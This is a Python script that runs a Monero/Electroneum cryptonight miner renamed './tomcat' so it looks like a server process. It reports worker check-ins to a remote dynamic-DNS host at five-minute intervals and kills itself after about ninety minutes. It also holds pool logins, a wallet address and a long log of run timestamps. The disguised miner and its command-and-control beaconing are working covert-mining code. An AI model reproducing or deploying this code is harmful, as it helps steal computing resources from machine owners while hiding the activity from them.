import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:07.496786
#2018-02-17 17:38:05.105351
#2018-02-17 19:25:01.582933
#2018-02-17 21:15:05.662105
#2018-02-17 23:00:06.281001
#2018-02-18 00:46:08.389846
#2018-02-18 02:34:05.864875
#2018-02-18 04:21:05.354263
#2018-02-18 06:13:04.652236
#2018-02-18 08:03:01.651284
#2018-02-18 09:50:07.191745
#2018-02-18 11:38:05.577628
#2018-02-18 13:23:03.702744
#2018-02-18 15:13:02.092599
#2018-02-18 17:02:04.696952
#2018-02-18 18:49:07.140225
#2018-02-18 20:35:06.842671
#2018-02-18 22:21:06.633610
#2018-02-19 00:10:01.779530
#2018-02-19 01:56:03.779464
#2018-02-19 03:43:02.076165
#2018-02-19 05:28:04.494111
#2018-02-19 07:16:06.196089
#2018-02-19 09:04:04.986967
#2018-02-19 10:51:07.304413
#2018-02-19 12:38:05.415555
#2018-02-19 14:27:07.757146
#2018-02-19 16:17:06.520246
#2018-02-19 18:03:01.435189
#2018-02-19 19:51:01.260518
#2018-02-19 21:39:07.849914
#2018-02-19 23:25:07.172007
#2018-02-20 01:11:04.849972
#2018-02-20 03:01:07.555222
#2018-02-20 04:49:04.530127
#2018-02-20 06:33:05.596757
#2018-02-20 08:18:06.646940
#2018-02-20 10:03:04.392334
#2018-02-20 11:47:08.701669
#2018-02-20 13:35:10.832164
#2018-02-20 15:19:05.429606
#2018-02-20 17:06:01.653130
#2018-02-20 18:53:02.243182
#2018-02-20 20:43:01.611679
#2018-02-20 22:27:03.803548
#2018-02-21 00:07:05.275559
#2018-02-21 01:52:07.081646
#2018-02-21 03:39:05.312292
#2018-02-21 05:27:07.372385
#2018-02-21 07:16:06.495880
#2018-02-21 09:02:07.702980
#2018-02-21 10:50:11.092778
#2018-02-21 12:36:03.951733
#2018-02-21 14:23:02.202040
#2018-02-21 16:10:10.716759
#2018-02-21 18:00:08.348565
#2018-02-21 19:46:01.314362
#2018-02-21 21:34:04.791054
#2018-02-21 23:19:07.202434
#2018-02-22 01:09:05.636738
#2018-02-22 02:57:05.156372
#2018-02-22 04:43:05.201520
#2018-02-22 06:28:03.760252
#2018-02-22 08:15:01.607256
#2018-02-22 10:03:04.361204
#2018-02-22 11:46:01.672269
#2018-02-22 13:31:05.276949
#2018-02-22 15:19:05.625880
#2018-02-22 17:04:07.836935
#2018-02-22 18:50:03.876494
#2018-02-22 20:43:01.593152
#2018-02-22 22:29:05.451158
#2018-02-23 00:16:07.322199
#2018-02-23 02:04:05.585232
#2018-02-23 03:50:10.865420
#2018-02-23 05:42:08.108007
#2018-02-23 07:27:07.539928
#2018-02-23 09:33:05.797806
#2018-02-23 11:40:06.931295
#2018-02-23 13:29:05.718481
#2018-02-23 15:16:06.181337
#2018-02-23 17:04:07.733970
#2018-02-23 18:52:06.409177
#2018-02-23 20:37:07.774212
#2018-02-23 22:24:01.584300
#2018-02-24 00:10:08.419534
#2018-02-24 02:03:07.859676
#2018-02-24 03:54:05.637183
#2018-02-24 05:42:02.133554
#2018-02-24 07:33:04.226298
#2018-02-24 09:20:01.431564
#2018-02-24 11:13:03.791587
#2018-02-24 13:03:04.151655
#2018-02-24 14:50:09.363763
#2018-02-24 16:42:03.827135
#2018-02-24 18:31:05.369240
#2018-02-24 20:17:05.228534
#2018-02-24 22:09:07.577044
#2018-02-25 01:07:02.049166
#2018-02-25 03:58:07.045099
#2018-02-25 06:42:06.049187
#2018-02-25 11:36:02.200357
#2018-02-25 13:18:01.886386
#2018-02-25 14:51:01.897961